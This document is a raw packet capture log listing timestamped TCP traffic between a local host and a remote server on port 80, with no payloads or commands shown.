                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940956116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940956116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940964937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940982103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.940995932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941011906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941013098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941030979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941034079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941065073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941070080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941086054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941101074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941114902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941132069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941138029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941138029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941154003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941158056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941179991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941195965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941210032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941226006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941241026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941247940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941247940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941258907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941284895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941302061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941318035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941333055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941348076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941365957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941369057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941369057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941381931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941409111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941411018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941425085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941441059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941457987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941466093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941477060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941487074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941500902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941515923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941530943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941545963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941560984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941560984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941572905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941586971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941591978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941607952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941632032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941643000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941648006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941663980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941665888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941679955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941696882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941711903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941725969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941725969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941729069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941744089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941781998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941793919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941798925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941817045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941831112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941832066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941849947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941864967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941881895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941910982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941922903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941956997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941967964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.941986084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942002058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942018032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942032099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942048073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942049026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942049026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942065954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942081928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942092896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942096949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942115068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942128897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942145109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942145109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942147017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942213058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942228079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942243099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942270041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942280054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942280054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942286015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942301989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942317009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942332983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942338943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942338943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942352057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942367077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942384958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942388058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942400932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942416906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942420959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942433119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942464113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942464113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942476034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942491055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942507029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942522049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942523003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942540884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942557096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942584038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942596912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942596912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942621946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942625046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942641973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942642927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942660093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942673922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942692041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942702055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942702055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942720890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942735910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942754030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942778111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942790985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942790985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942795038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942811966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942826986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942852974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942862034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942862034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942868948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942886114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942903042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942914963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942930937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942940950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942940950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942948103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942967892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.942977905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943002939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943012953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943037987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943052053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943078041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943090916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943104982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943109035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943109035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943121910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943135977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943151951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943161011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943166018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943182945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943182945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943198919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943217993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943223000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.943298101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944399118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944416046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944432974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944444895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944447041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944474936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944478035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944490910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944509029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944509983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944525003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944555044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944593906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944619894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944644928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944652081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944659948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944677114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944689989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944701910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944715977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944730997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944735050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944747925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944761992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944787979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944791079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944791079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944803953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944819927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944820881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944834948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944850922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944865942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944880962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944880962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944883108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944899082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944914103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944931984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944941998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944952011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944960117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944973946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.944988966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945003986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945019960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945020914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945020914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945036888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945053101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945067883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945084095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945084095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945092916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945108891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945137024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945163012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945166111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945166111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945179939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945194960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945210934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945225000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945235014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945240974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945257902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945269108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945272923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945287943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945290089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945310116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945310116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945328951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945389032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945458889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945476055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945492029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945504904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945506096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945530891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945549011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945559025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945573092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945588112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945612907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945627928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945627928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945627928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945660114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945676088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945691109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945705891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945717096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945717096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945722103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945741892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945744991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945761919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945782900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945796967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945801020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945827961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945839882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945853949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945878983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945893049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945909023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945923090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.945930958 CET4973380192.168.2.442.96.10.8
